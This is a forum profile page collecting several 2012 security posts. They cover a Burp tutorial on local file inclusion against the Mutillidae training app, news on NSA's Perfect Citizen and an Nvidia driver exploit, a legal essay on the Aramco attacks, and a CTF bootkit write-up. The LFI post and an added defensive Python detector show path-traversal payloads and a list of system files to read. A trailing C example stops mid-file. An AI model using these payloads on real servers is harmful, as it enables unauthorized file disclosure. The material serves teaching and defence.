Everything posted by Nytro
-
[h=2]Local File Inclusion Exploitation With Burp[/h]

Local file inclusion is a vulnerability that allows the attacker to read files that are stored locally through the web application. This happens because the code of the application does not properly sanitize the include() function. So if an application is vulnerable to LFI, this means that an attacker can harvest information about the web server. Below you can see an example of PHP code that is vulnerable to LFI.

[Image: Vulnerable code to LFI]

In this article we will use Mutillidae as the target application in order to exploit the local file inclusion flaw through Burp Suite. As we can see from the next screenshot, the user can select the file name and can view its contents just by pressing the "view file" button.

[Image: Location of LFI on the web application]

So what we will do is try to capture and manipulate the HTTP request with Burp in order to read system files.

[Image: Capturing the HTTP request]

As we can see from the above request, the web application is reading the files through the textfile variable. So we will try to modify that in order to read a system directory like /etc/passwd. In order to achieve that we have to go out of the web directory by using directory traversal.

[Image: HTTP request modification – /etc/passwd]

We will forward the request and now we can check the response on the web application as the next image is showing:

[Image: Reading the /etc/passwd]

We have successfully read the contents of the /etc/passwd file. Now with the same process we can dump other system files as well. Some of the paths that we might want to try are the following:

- /etc/group
- /etc/hosts
- /etc/motd
- /etc/issue
- /etc/mysql/my.cnf
- /proc/self/environ
- /proc/version
- /proc/cmdline

[Images: contents of /etc/group, /etc/hosts, motd, /etc/issue, the MySQL configuration file, /proc/self/environ, /proc/version and /proc/cmdline]

Conclusion

As we saw, the exploitation of this vulnerability doesn't require any particular skill but just knowledge of well-known directories for different platforms. An attacker can discover a large amount of information about his target through LFI just by reading files. It is an old vulnerability which cannot be seen very often in modern web applications.

Source: https://pentestlab.wordpress.com/2012/12/26/local-file-inclusion-exploitation-with-burp/
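The fix for the flaw exploited above is to stop trusting the textfile parameter. The following is an added example, not code from the article or from Mutillidae: it puts the flawed concatenation next to a hardened resolver (decode, reject NUL, canonicalise, check containment, allow-list), and runs a detector over constructed access-log lines that flags traversal attempts and requests resolving to the system files the article lists. The web root, allow-list and log lines are all assumptions made up for the example.

```python
"""Vulnerable vs. hardened handling of the 'textfile' parameter, plus a
detector for traversal attempts in access-log lines. Added example; the
web root, allow-list and log lines are constructed, not Mutillidae's."""
import os
import re
import urllib.parse

WEB_ROOT = "/var/www/app/text"                 # constructed web root
ALLOWED_FILES = {"robots.txt", "readme.txt"}   # files the page may serve

# System files the article lists as worth reading through LFI; a request
# whose decoded parameter resolves to one of them is a strong signal.
SENSITIVE_PATHS = {
    "/etc/passwd", "/etc/group", "/etc/hosts", "/etc/motd", "/etc/issue",
    "/etc/mysql/my.cnf", "/proc/self/environ", "/proc/version",
    "/proc/cmdline",
}


def vulnerable_resolve(textfile: str) -> str:
    """The flawed pattern: user input is joined straight onto the web root,
    so '../' sequences walk out of it (this is what the article exploits)."""
    return os.path.normpath(os.path.join(WEB_ROOT, textfile))


def hardened_resolve(textfile: str):
    """Return an absolute path inside WEB_ROOT, or None to refuse the request."""
    decoded = urllib.parse.unquote(textfile)   # '%2e%2e%2f' becomes '../'
    if "\x00" in decoded:                      # NUL-byte truncation tricks
        return None
    candidate = os.path.normpath(os.path.join(WEB_ROOT, decoded))
    # Containment: the canonical path must still live under WEB_ROOT.
    # An absolute 'textfile' makes os.path.join discard WEB_ROOT entirely,
    # which this check also catches.
    if os.path.commonpath([WEB_ROOT, candidate]) != WEB_ROOT:
        return None
    # Allow-list of file names: makes the traversal question irrelevant.
    if os.path.basename(candidate) not in ALLOWED_FILES:
        return None
    return candidate


def classify_request(query_string: str) -> str:
    """Label one request's query string as 'ok', 'traversal' or
    'sensitive-file' (when the decoded parameter resolves to a known
    system file under the vulnerable resolver)."""
    params = urllib.parse.parse_qs(query_string, keep_blank_values=True)
    textfile = params.get("textfile", [""])[0]
    decoded = urllib.parse.unquote(textfile)   # second pass: double encoding
    if vulnerable_resolve(decoded) in SENSITIVE_PATHS:
        return "sensitive-file"
    if ".." in decoded.split("/") or decoded.startswith("/"):
        return "traversal"
    return "ok"


# Constructed access-log lines (combined format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Dec/2012:10:00:01 +0000] "GET /index.php?page=text-file-viewer.php&textfile=robots.txt HTTP/1.1" 200 512
10.0.0.7 - - [26/Dec/2012:10:00:09 +0000] "GET /index.php?page=text-file-viewer.php&textfile=../../../../etc/passwd HTTP/1.1" 200 2048
10.0.0.7 - - [26/Dec/2012:10:00:12 +0000] "GET /index.php?page=text-file-viewer.php&textfile=..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 1900
10.0.0.9 - - [26/Dec/2012:10:00:20 +0000] "GET /index.php?page=text-file-viewer.php&textfile=../other/notes.txt HTTP/1.1" 404 0
"""

LOG_RE = re.compile(r'^(\S+) .*"GET (\S+) HTTP')


def scan_log(log_text: str):
    """Return [(client_ip, label)] for every request that is not 'ok'."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        ip, target = m.groups()
        label = classify_request(urllib.parse.urlsplit(target).query)
        if label != "ok":
            hits.append((ip, label))
    return hits


if __name__ == "__main__":
    print("vulnerable:", vulnerable_resolve("../../../../etc/passwd"))
    print("hardened:  ", hardened_resolve("../../../../etc/passwd"))
    for ip, label in scan_log(SAMPLE_LOG):
        print(ip, label)
```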
-
NSA 'Perfect Citizen' Program Documents Released, Report

By Brian Prince on December 27, 2012

A National Security Agency (NSA) program designed to discover security vulnerabilities at critical infrastructure companies is in full swing, according to documents reportedly obtained by the Electronic Privacy Information Center (EPIC).

The program, dubbed 'Perfect Citizen', was unmasked in 2010 in a report by the Wall Street Journal that claimed it involved sensors that monitored networks at critical infrastructure companies. At the time however, the NSA stated publicly the program did not involve "the monitoring of communications or the placement of sensors on utility company systems," and that the project provided a set of technical solutions to help the NSA understand "threats to national security networks."

According to CNET, using a Freedom of Information Act (FOIA) request, EPIC obtained 190 pages of files on Perfect Citizen, at least 98 of which were completely deleted for security reasons. The portions that were readable showed that defense company Raytheon received a $91 million contract to build Perfect Citizen and was authorized to hire up to 28 hardware and software engineers to analyze and document vulnerability research against control systems and devices. The program is slated to continue through at least 2014, according to CNET.

Marc Rotenberg, executive director of EPIC, told CNET that the documents may help disprove the NSA's claims that Perfect Citizen doesn't involve monitoring private networks.

This year has seen multiple reports of the U.S. expanding its efforts to defend cyberspace and develop offensive weapons, including reports about malware such as Stuxnet and Flame linking to secret operations involving the NSA and other agencies. The U.S. has not officially admitted to using cyberweapons in the wild. However, earlier this year, the Washington Post reported the Pentagon was accelerating plans to develop cyberweapons, and that the amount of spending disclosed by the Pentagon on cybersecurity initiatives and technology in 2012 was $3.4 billion.

"If your defense is only to try to block attacks you can never be successful," General Keith Alexander, director of the National Security Agency and commander of the US Cyber Command, told a Washington symposium in October.

Source: NSA 'Perfect Citizen' Program Documents Released, Report | SecurityWeek.Com
-
[h=1]Nvidia Display Driver Service Attack Escalates Privileges on Windows Machines[/h]

by Michael Mimoso

There's nothing like a zero-day to ruin the holiday break, but that's just what may be in store for engineers at Nvidia after a researcher discovered a new vulnerability in the Nvidia Display Driver Service. The flaw could hand over administrator privileges on Windows machines to an attacker.

Peter Winter-Smith, formerly with the NGS Software of the U.K., posted details of the vulnerability and exploit to Pastebin. In it, he explains that the service is vulnerable to a stack buffer overflow that bypasses data execution prevention (DEP) and address space layout randomization (ASLR) running in the Windows operating system since Windows Vista.

"The service listens on a named pipe (\pipe\nsvr) which has a NULL DACL configured, which should mean that any logged on user or remote user in a domain context (Windows firewall/file sharing permitting) should be able to exploit this vulnerability," Winter-Smith wrote on Pastebin. "The buffer overflow occurs as a result of a bad memmove operation."

Winter-Smith told Threatpost the vulnerability is difficult to exploit because it mostly affects domain-based machines, and the machines in question would have to have relaxed firewall rules and need to be able to share files.

"In the local scenario in which an attacker attempts to gain increased privileges on a machine they already have access to, it would be very easy," Winter-Smith said. "It's not incredibly serious (compared to, say, a browser exploit). If it were going to put people at risk I'd not have released exploit code and I'd have informed the vendor and kept quiet until a fix were issued."

Winter-Smith said an attacker could exploit the vulnerability in two ways: with local access they could escalate privileges to root, giving them full control over the machine; or remotely against machines on the same Windows domain, if the user running Nvidia has enabled file sharing from their machine or has disabled their firewall, remote access can be gained.

Memmove operations copy data from a source location to a memory destination. Winter-Smith said the service copies data unchecked; an attacker would be able to control the source location as well as the number of bytes copied into the response buffer; an attacker would be able to leak data from the stack by overflowing it.

"The memmove function copies data from one place in memory to another, and the fact that it was not properly used allowed me to both copy data critical to bypassing the Windows protections," Winter-Smith said, "by copying private data in memory within the Nvidia service process into the data buffer that would be sent back to me, and trigger the vulnerability (by overwriting memory sufficient to give me full control over what the Nvidia service would try to do once the processing of my messages had completed)."

Nvidia, based in Santa Clara, Calif., builds graphics processing units for PCs, mobile and embedded devices, as well as other processing applications for high-performance computing systems. Nvidia competes with Intel, AMD and Qualcomm in these markets. The nvsvc32.exe service in question here runs automatically on any Windows machine running a Nvidia GPU.

Winter-Smith said he wanted to share the exploit in a timely fashion, rather than report it. "I am definitely not averse to responsible disclosure and typically do follow a responsible disclosure process, however the risk from this particular flaw being exploited was (is) sufficiently low that I didn't think it would warrant the wait," he said.

Source: Nvidia Display Driver Service Attack Escalates Privileges on Windows Machines | threatpost
-
[h=1]The cyber attacks on Saudi Aramco, RasGas, and U.S. banks in the context of international law[/h]

Dimitar Kostadinov, December 26, 2012

Introduction

When it was created, the Internet was launched as a classified military experiment, but nowadays it is a widely used tool that has a multitude of purposes. Recent cyber attacks on Saudi Arabia's state oil company Saudi Aramco, the Qatari gas firm RasGas, and denial-of-service attacks on some major U.S. banks come as evidence that the battlefield is shifting from a three-dimensional to a linear front, and this tendency may also result in an overall drastic change of warfare standards. In spite of the obvious improvement of life standards which this technological revolution brought, the great dependency on computers may open a new page of warfare conduct. Because international law is hampered by constraints imposed before the advent of cyber attacks, one of the most significant challenges today is withstanding this rapid advance of computer technology.

Jus ad bellum and cyber warfare. Interaction and specifics of the "use of force" and "armed attack" terms

The most essential jus ad bellum provisions are Article 2(4), the prohibition on the use of force, and Article 51 of the UN Charter, the use of self-defense. These norms bind all states whether or not they are members of the United Nations. Although the UN Charter was drafted long before the emergence of the Internet and cyber attacks respectively, its provisions regulate any use of force. This fact has been affirmed by the International Court of Justice (ICJ): Article 2(4) and Article 51 are applicable to "any use of force, regardless of the weapons employed" (ICJ, 1996). Among most scholars, there is no doubt that cyber attacks could qualify as a use of force pursuant to Article 2(4) and self-defense as in Article 51. Consequently, the UN Charter system, as well as customary international law, regulates the conflicts in which the parties can use computer systems to inflict harm on each other (Robertson, 2002).

In relation to the aforementioned provisions, there are two significant terms, "use of force" (Article 2(4)) and "armed attack" (Article 51), which seem to have a certain correlation between them. A careful textual analysis ascertains that both terms have different purposes and scope. While the concept of "use of force" seems to be broader in meaning, the term "armed force" is directly related to severe cases of threats to the peace, breach of the peace, or acts of aggression (Schmitt, 1999). In the Nicaragua case (1985), the ICJ affirms that there is a difference between a "use of force" and an "armed attack". The court adopts the view that an armed attack constitutes a higher degree as it bears direct infliction of death/injury on human beings or physical damage on property. This distinction made by the court does not tie the hands of a state when it suffers an information operation that does not rise to the standard of "armed attack". Simply, it means they should restrain their response short of military action (Schmitt, 2003). The distinction between an armed attack and the use of force is premeditated. The current U.N. scheme precludes responses, especially unilateral actions, to acts which do not rise to the level of an armed attack.

The type and level of response to cyber attacks

Similar to terrorist acts, cyber attacks are initiated without warning and often the result of the attack is noticeable within seconds after it has been launched, thus giving the victim almost no time to react. Usually, the level and type of response to the use of force is determined more or less by the extent of the impact of the initial strike. A cyber attack directed against a minor target that is not meant to cause grave consequences, such as death/injury or destruction/damage, would most probably not be viewed as an armed attack. Moreover, the state's prerogative to respond to the use of force in self-defense is regulated by the necessity and proportionality tenets:

Necessity. The principle of necessity justifies a more decisive action when all peaceful means are exhausted and there are no further options to settle the conflict any other way than through the use of forceful methods.

Proportionality. The proportionality tenet regulates the quantity of the countermeasures used. They must be proportional and adequate to those used in the initial attack made by the aggressor.

Not exactly clear is the situation when the uses of force do not reach the threshold of an armed attack. Both unilateral attack and collective self-defense are not allowed. Nonetheless, although reprisals infringe on international law, acts like retorsion have become increasingly popular and often occur in cyber warfare. The attacks on Saudi Aramco, RasGas, and the US banks are thought to be retaliation strikes for the Stuxnet worm, which was allegedly devised by the joint efforts of US and Israeli specialists and designed to undermine Iran's nuclear ambitions (Sale, 2012). International law prohibits such attacks, but one way to cope with this situation is to address the issue to the UN Security Council, with the hope of getting permission for a forceful response not related to armed attack under Article 39 of the Charter. Unilateral responses are restricted without authorization from the Security Council. When passive defensive measures prove themselves incapable of preventing an aggressive act, then the injured State has the right to retrieve reparations for the damages suffered. Of course, in accordance with current international law, such a claim would only be possible if there is an actual agreement on cyber attacks between the states in question (Creekman, 2002).

The current warfare legislation and Schmitt's scheme

The state practice concerning applying the jus ad bellum legal framework to cyber attacks, more specifically the use of force notion, is vague and ambiguous. Even though the current jus ad bellum and in bello do not regulate cyber attacks well, they can still serve as "a model for devising rules." One way to adjust the notion of cyber attacks is to shape it with the help of the general principles and pre-existing legal frames for conventional armed attacks. Such an adjustment must stay by all means flexible and should not be performed in a merely prohibitive manner (Brown, 2006). As an alternative, Michael Schmitt, the Chairman of the International Law Department at the United States Naval War College, proposes a scheme of factors that may prove useful when a person evaluates whether a cyber attack constitutes a use of force and/or resembles a conventional armed attack (Schmitt, 2011). These factors are:

(1) Severity. This is the most important factor because it gives information about the negative consequences of a cyber attack. The Shamoon virus destroyed the hard drives of most of Aramco's computers and erased the data on management servers which were of utmost importance for the company. U.S. Defense Secretary Leon Panetta claims that cyber attacks "could be as destructive as the terrorist attack of 9/11," whether conducted by a state or non-state actors (Riley & Engleman, 2012).

(2) Immediacy. This criterion is also important because it indicates how soon the consequences emerge after the impact. If the results are evident soon after the attack, as is often the case with cyber attacks, the chance for a peaceful solution or other viable alternative decreases. Conversely, there are many concerns about computer methods like logic and time bombs whose real consequences appear with some delay (Schmitt, 2011). Shamoon's code has an embedded timer that was set to attack at the exact time that Aramco's computers were struck (Perlroth, 2012).

(3) Directness. This factor accentuates the chain of causation of a cyber attack and assesses the line of events that would eventually lead from the act to the results (Schmitt, 1999). The Shamoon virus, as well as the Stuxnet worm, hit their targets causing direct negative consequences: data erasure or system malfunctions.

(4) Invasiveness. A factor related to the level of penetration in a secured system. Unauthorized armed attacks usually cross into another country's border and they impair significantly the sovereignty of the victim state. Hence, the stability of the target state is threatened and the authority of the government and its institutions is undermined (Schmitt, 1999). The infected computers at Saudi Aramco weren't connected to the Internet, and according to the officials involved in the investigation, the virus was distributed from a USB memory stick by an employee of the company (Sale, 2012).

(5) Measurability. This criterion identifies the consequences in terms of quantity. If the indicator shows that the number is too high, then the state's interest is more likely to be impaired (Schmitt, 1999). In terms of numbers, the attack on Saudi Aramco wiped the data on 30,000 computers, whereas the Stuxnet worm temporarily took 1,000 centrifuges at the Natanz nuclear plant out of order.

(6) Presumptive Legitimacy. Schmitt concludes that if an act is not prohibited, then it is permitted. The main reason is that international law tries to make the interpretation and implementation process simpler and also because it is prohibitive by nature (Schmitt, 2011). Erasing important information from the computers of a major oil company, sabotaging the functionality of a nuclear plant, and performing denial-of-service attacks on banks and financial institutions is however, by any means, illegitimate.

(7) Responsibility. An indicator which stands to show when a state is responsible for a cyber attack. The level of involvement of a state in a certain operation is the key here. If the state in question is deeply involved in a particular cyber attack, then this occurrence is more likely to be categorized as a use of force (Schmitt, 2011). Nevertheless, a cyber attack must be duly attributed first before a state is held responsible.

The Attribution Requirement

A very important issue is the attribution of the relevant actions to a state. The attribution of an attack to state agents is a condicio sine qua non under international law because of the potential misguidance of a counter strike towards an "innocent" computer system (Graham, 2010). When the attacker is a state actor, then the countermeasures must observe the jus ad bellum and jus in bello prescriptions pursuant to the UN Charter and customary international law (Condron, 2007). There is a predominant conviction in international jurisprudence that only states can be adversaries and are entitled to the right to use force in the sense of the UN Charter, and that non-state actors are excluded from the scope of Article 2(4) (Barkham, 2001). Non-state actors like individuals, organized groups, and terrorist organizations need to be linked to a state in order to bear responsibility under this article; otherwise their actions may violate the domestic law of the country which they belong to but not the prohibition on the use of force (Schmitt, 2003).

Supposedly, most cyber attacks are conducted by individuals. The members of various terrorist organizations have gradually become more and more computer literate (Graham, 2010); for example, the minor hacker group "Cutting Sword of Justice," which took responsibility for the cyber attack on Aramco, consists only of about 100 participants. It is thought that this group is covertly sponsored by the Iranian government. However, the direct and affirmative attribution to another state may be a difficult task to deal with because of the inherent anonymity of these attacks. The forensic officials involved in the Aramco investigation are not certain that the incident was an Iranian act. On the other hand, the forensic conclusion could not prove with certainty that the cyber attack wasn't executed by a non-state actor. The virus could have been simplified on purpose (Riley & Engleman, 2012). However, there is a general conviction that Iran is behind all of the recent cyber attacks.

Conclusion

The probability of grave cyber attacks imposes an obligation on policymakers to generally reconsider the manner in which they conduct the protection of computer networks and devices, especially those which are an underlying segment of a critical national infrastructure. Clearly, cyber attacks present an enormous challenge to the jus ad bellum norms because those norms were elaborated well before the emergence of the Internet. Taking into account the significant damage of the cyber attacks on Saudi Aramco, RasGas, the US banks, as well as the Stuxnet hit at Natanz, the international community must realize completely the fact that grave cyber attacks are not myth, but reality, and that more decisive measures regarding this threat and its existence within the jus ad bellum framework are needed.

Reference List

Barkham, J. (2001). Information warfare and international law on the use of force. N.Y.U. J. Int'l L. & Pol., 34, 57.
Brown, D. (2006). A proposal for an international convention to regulate the use of information systems in armed conflict. Harv. Int'l L.J.
Condron, S. (2007). Getting it right: Protecting American critical infrastructure in cyber space. Harvard Law Review, 20, 403-422.
Creekman, D. (2002). A helpless America? An examination of the legal options available to the United States in responding to varying types of cyber attacks. Am. U. Int'l L. Rev., 3, 641-681.
Graham, D. (2010). Cyber threats and the law of war. Journal of National Security Law and Policy, 4, 87-104.
International Court of Justice (1996). The legality of the threat or use of nuclear weapons. Retrieved from International Court of Justice.
International Court of Justice (1986). Military and Paramilitary Activities in and against Nicaragua (Nicaragua v. United States of America). Retrieved from International Court of Justice.
Perlroth, N. (2012). In cyberattack on Saudi firm, U.S. sees Iran firing back. Retrieved from http://www.nytimes.com/2012/10/24/business/global/cyberattack-on-saudi-oil-firm-disquiets-us.html?pagewanted=all
Riley, M. & Engleman, R. (2012). Code in Aramco cyber attack indicates lone perpetrator. Retrieved from Code in Aramco Cyber Attack Indicates Lone Perpetrator - Bloomberg.
Robertson, H. B. (2002). Self-defense against computer network attack. Int'l L. Stud., 76, 121-123.
Sale, R. (2012). Saudi insider likely key to Aramco cyber-attack. Retrieved from http://www.ipsnews.net/2012/10/saudi-insider-likely-key-to-aramco-cyber-attack/
Schmitt, M. (1999). Computer network attack and use of force in international law. Columbia Journal of Transnational Law, 37, 885-937.
Schmitt, M., Harrison, D., Heather, A., & Winfield, T. (2004). Computers and war: The legal battlespace. Harvard Program on Humanitarian Policy and Conflict Research.
Schmitt, M. (2011). Cyber operations and the jus ad bellum revisited. Villanova Law Review, 56, 569-606.

Source: InfoSec Institute Resources – The cyber attacks on Saudi Aramco, RasGas, and U.S. banks in the context of international law
-
[h=3]PHDays CTF Quals – BINARY 500 or Hiding Flag Six Feet Under (MBR Bootkit + Intel VT-x)[/h]PHDays CTF Quals took place on December 15-17, 2012. More than 300 teams participated in this event and fought to become a part of PHDays III CTF, which is going to be held in May 2013. Our team had been developing the tasks for this competition for two months. And this article is devoted to the secrets of one of them – Binary 500. This task is very unusual and hard-to-solve, so nobody could find its flag. This executable file is an MBR bootkit, which uses hardware virtualization (Intel VT-x). Due to the program’s specific features, we decided to warn users that this program should be executed on a virtual machine or an emulator only. Warning and license agreement Dropper Let’s start with the dropper overview. The main goal of this module is very simple. It is to write files extracted from a resource section into a self-made hidden file system and replace original MBR with a self-made one. It also saves original MBR in the file system. There are few things, which complicate the dropper analysis. First of all, it is written in C++ using STL, OOP, and virtual functions. That’s why all the calls are indirect. Virtual function calls in IDA Pro Secondly, all the disk operations are carried out via the SCSI controller. Instead of the usual ReadFile/WriteFile functions, we use DeviceIoControl with the control code SCSI_PASS_THROUGH_DIRECT, which allows us to communicate with the hard drive on a lower level. All the files from the resources are encrypted using RC4 and a 256-bit key. The next thing is the hidden file system. Its structure is pretty simple. The system grows from the end and is written two sectors before the end of the hard drive. First DWORD is a number of files XORed with constant 0x8FC54ED2. 
Then a directory with information about the files goes: struct MiniFsFileEntry { DWORD fileIndex; DWORD fileOffset; DWORD fileSize; }; The file index is just a constant related to a specific file. Offset is counted in bytes relative to the file system start. MiniFs file system structure MBR After the dropper ends its operation, it becomes obvious that we have nothing left to do with the operating system and just need to reboot and start debugging the master boot record. There are several ways to debug MBR. There’s no doubt we can analyse it on a real machine using a hardware debugger, but it’s inconvenient and expensive. That is why we recommend to use the VMWare virtual machine (you need to configure an image configuration file at first) connecting to it with the help of the GDB debugger (this method has significant drawbacks, which will be described later) or the Bochs emulator. The main advantage of these methods is that you can use the IDA Pro debugger for analysis and it’s very convenient! Having chosen our instruments, we are able to get started. The first part of MBR is really simple, and there shouldn’t be any problems with its analysis. It only reads the second part of our MBR (Extended MBR) from the hard drive and writes it to the memory at address 0x7e00 (right after the first part). This operation is important because BIOS maps just the first 512 bytes of MBR and our code exceeds this size. Analyzing extended MBR, a good specialist will immediately understand that something is wrong, namely that the loader is obfuscated. Comparison of MBR source code with the IDA Pro analysis Obfuscation is complicated mainly by indirect function calls. At the very beginning AX registers the address of a function, which scans a specific table (containing function indexes and related offsets) to get the offset of a function to be called. After the function is fulfilled, the control is returned right after the function index constant (return address + 2). 
Function table in MBR MBR obfuscation algorithm MBR code is pretty simple: Retrieves hard drive features. Reads original MBR from the hidden file system. Replaces our MBR with original MBR at the 0x7c00 address. Reads and decrypts a hypervisor loader from the file system. Reads and decrypts a hypervisor body from the file system. Prepares parameters and passes control to the hypervisor loader. It should be mentioned that a set of bytes of Bochs BIOS was used for encryption of the hypervisor loader and body. It makes the program system-specific, because it runs correctly only on the Bochs emulator. We decided to use this method for several reasons. Firstly, debugging of Intel VT-x hardware virtualization is possible only on a real machine or using Bochs 2.4.5 or later (so we are already tied to this emulator). Secondly, we didn't want the participants to find encryption keys in the program and decrypt all the hypervisor parts using the static analysis without the debugger. Thirdly, this method prevents users from damaging systems on real machines. To help the participants, we had published information that they would need Bochs emulator with a working OS image to solve one of the tasks in advance. VMX Loader Hardware virtualization is not a new term. It started to spread in 2006 – 2007 when the most well-known CPU developers (Intel and AMD) released processors, which could support related instruction sets. Details on the virtual machine monitor will be provided in the next section. This section will touch upon the methods how to prepare the system for the hardware hypervisor. As it was mentioned above, it is possible to debug an application, which uses Intel VT-x virtualization, only on real machine or using Bochs 2.4.5 or above, but it is not the only problem. The default emulator build does not support hardware virtualization. That is why we had to compile our own build of Bochs and provide a link to it in the first hint to the task. 
The main goal of the hypervisor loader is to move the hypervisor’s body above the first megabyte and transfer control to its entry point. However, it carries out some non-trivial operations, which will be covered below. There are several input parameters including a base address, which is used as a code segment base. It is set by a far jump. Then the CPUID instruction checks that code is executed on the Intel system (zero function) and that hardware virtualization is supported by the processor (first function). Let’s take a closer look. Firstly, we call CPUID with value 1 in the EAX register. After the execution, the fifth bit of the ECX register (VMX flag) should be checked. If it is set, then hardware virtualization is supported. To check if virtualization is blocked on the early boot stages (BIOS), we need to read 0x3A MSR register. If the first bit of the EAX register is set after RDMSR instruction execution and the second bit is clear then virtualization is blocked. Then the loader calls a function, which reads the system memory map. This is achieved by calling interrupt 0x15 in the cycle with the 0xE820 value in the EAX register. That’s how the buffer is filled with records of memory regions. Then the memory map is checked for a free area suitable for the monitor body. If such a memory is found, it is marked as reserved. To move monitor body above the first megabyte, we need to switch the processor from a real mode to a protected or long mode. We decided to switch directly to the long mode as the hypervisor body works in it. We need to satisfy several conditions: prepare paging structures (PML4, PDPT, a number of PDs for 2MB pages), set PAE bit in the CR4 register, load the PML4 address to the CR3 register, set up GDTR with the long-mode segment registers, set the LMA bit in the MSR EFER register and set the PG and PE bits in the CR0 register. After these operations, we should make a far jump to switch the processor to the long mode. 
We noticed at this moment that the IDA Pro 6.1 debugger has a bug, which prevents it from calculating a correct far address, and it shows users some garbage data (this bug is fixed in IDA 6.3). It seems that IDA does not use register values from the Bochs debugger and makes wrong calculations by itself. That is why we recommended the participants to use the built-in Bochs debugger. The last step is to copy the body to the destination address and transfer control to the entry point. VMX Hypervisor Specifically for this task we wrote a thin hypervisor, which: Enters the VMX-root mode. Sets the VMCS structure to start the guest system in the real mode starting from the 0x7c00 address. Sets up guest exit handlers. Starts a guest by executing the VMLAUNCH instruction. The main goal of a participant is to find a guest system exit handler and analyze its code. Flag Obtaining the virtual machine exit handler, a participant came to the final stretch, and only a small task was needed to be solved. It is obvious from handler's code that if the CPUID instruction causes an exit and the EIP register contains a specific value then the handler creates an array (32 bytes) from the values of the registers EAX, ECX, EDX, EBX, ESI, EDI, ESP, EBP and then this array is checked for validity. The handler inserts vector (x_0,…,x_31 ) to the set of equations of the following type: If the equality is satisfied then the vector is valid and used as a key for buffer decryption. Therefore, a participant needs to solve a set of 32 equations with 32 variables. The only thing that complicates the analysis is that the validation algorithm uses a floating point unit (FPU) instruction set. There is one more (final) MBR in the encrypted buffer which contains a plaintext flag. This bootstrap substitutes the original MBR, and its goal is to display the flag on the screen. 
Example of a displayed flag

Test application

Specifically for testing, we developed an application which allocates memory at a given address, writes CPUID and a few other instructions at a specific offset (address + offset = the needed EIP value), sets up the registers and passes control to the given address. Therefore, when the CPUID instruction is executed, the hypervisor takes over control, checks the register values, and reboots the system, displaying the flag on the screen.

Example of a test application

Conclusion

In developing this application, we wanted to create something unusual: a program which would be interesting for the whole team, because to solve this task the participants needed to have skills in Win32 reverse engineering, analysis of an MBR executed in real mode, and analysis of encryption and obfuscation algorithms. This task required both static and dynamic analysis. The participants needed to have basic knowledge of hardware virtualization and x86-64 assembler, and to use their mathematical skills to obtain the flag. We really hope that we managed to interest both the participants and the readers of this review!

From the authors

We decided to write this task three weeks before the start of the qualifications and were absolutely sure that we would finish very soon, but our expectations were not met. We finished the task just a few hours before PHDays CTF Quals started and did not have any time to test it or fix the bugs. We were only sure that it was possible to obtain the flag, but the operating system did not run so well in the virtual environment. It displayed blue screens of death from time to time and didn't want to boot after resetting the system. While writing this article, we had some time to fix the bugs and release a more stable task. Unfortunately, this time was not enough either to stabilize the operating system.
Follow the links to download the latest version of the task and watch the video demonstrating the task and the test application in operation. Thanks to everybody!

Max Grigoryev, Sergey Kovalev, Positive Research

Source: Positive Research Center: PHDays CTF Quals – BINARY 500 or Hiding Flag Six Feet Under (MBR Bootkit + Intel VT-x)
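The two decisions the loader makes before it leaves real mode, the VMX availability check and the 0xE820 memory-map search, can be checked in isolation. The following is an added example and is not the PHDays task's code: it takes the values CPUID leaf 1 and RDMSR 0x3A would return, applies the write-up's rule (lock bit set, enable bit clear means VMX is blocked; this reads the "second bit" as the architectural VMXON-outside-SMX bit, bit 2), and then finds a 2MB-aligned RAM region above the first megabyte large enough for the monitor body and splits the map so that region is reserved. The sample E820 map and the body size are constructed here, and `reserve_above_1mb` is a hypothetical name.

```c
/* Added example: loader-side VMX check and E820 region reservation,
 * written as plain C over captured register and map values. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define CPUID1_ECX_VMX        (1u << 5)      /* CPUID.1:ECX bit 5 */
#define FC_LOCK               (1ull << 0)    /* IA32_FEATURE_CONTROL (MSR 0x3A) lock bit */
#define FC_VMXON_OUTSIDE_SMX  (1ull << 2)    /* assumed reading of the write-up's "second bit" */

enum vmx_state { VMX_UNSUPPORTED, VMX_LOCKED_OFF, VMX_USABLE };

/* Decide whether VMX can be used from CPUID leaf 1 ECX and the RDMSR(0x3A) result. */
enum vmx_state vmx_state_from_regs(uint32_t cpuid1_ecx, uint64_t feature_control)
{
    if (!(cpuid1_ecx & CPUID1_ECX_VMX))
        return VMX_UNSUPPORTED;
    /* Firmware locked the MSR without enabling VMX: the loader cannot turn it on. */
    if ((feature_control & FC_LOCK) && !(feature_control & FC_VMXON_OUTSIDE_SMX))
        return VMX_LOCKED_OFF;
    return VMX_USABLE;
}

struct e820_entry { uint64_t base; uint64_t len; uint32_t type; };
#define E820_RAM      1
#define E820_RESERVED 2
#define ONE_MB 0x100000ull
#define TWO_MB 0x200000ull
#define ALIGN_UP(x, a) (((x) + (a) - 1) & ~((a) - 1))

/* Shift entries right and place `ent` at index `at`; fails when the table is full. */
static int insert_entry(struct e820_entry *map, size_t *count, size_t cap, size_t at,
                        struct e820_entry ent)
{
    if (*count >= cap) return 0;
    for (size_t j = *count; j > at; j--) map[j] = map[j - 1];
    map[at] = ent;
    (*count)++;
    return 1;
}

/* Find a RAM region above 1MB holding `need` bytes at a 2MB-aligned address and
 * mark exactly that range reserved, splitting the entry as needed.
 * Returns the chosen address, or 0 if nothing fits or the table cannot grow. */
uint64_t reserve_above_1mb(struct e820_entry *map, size_t *count, size_t cap, uint64_t need)
{
    for (size_t i = 0; i < *count; i++) {
        if (map[i].type != E820_RAM) continue;
        uint64_t base  = map[i].base, end = base + map[i].len;
        uint64_t start = ALIGN_UP(base > ONE_MB ? base : ONE_MB, TWO_MB);
        if (start >= end || end - start < need) continue;
        uint64_t rend = start + need;
        size_t extra = (start != base) + (rend != end);
        if (*count + extra > cap) return 0;          /* no room to split the map */
        size_t at = i;
        if (start != base) {                         /* leading RAM piece stays at i */
            map[i].len = start - base;
            at = i + 1;
            struct e820_entry r = { start, need, E820_RESERVED };
            insert_entry(map, count, cap, at, r);
        } else {                                     /* entry begins exactly at start */
            map[i].len = need;
            map[i].type = E820_RESERVED;
        }
        if (rend != end) {                           /* trailing RAM piece */
            struct e820_entry t = { rend, end - rend, E820_RAM };
            insert_entry(map, count, cap, at + 1, t);
        }
        return start;
    }
    return 0;
}

/* Constructed sample map (not from the page), in the order INT 15h/E820 returns it. */
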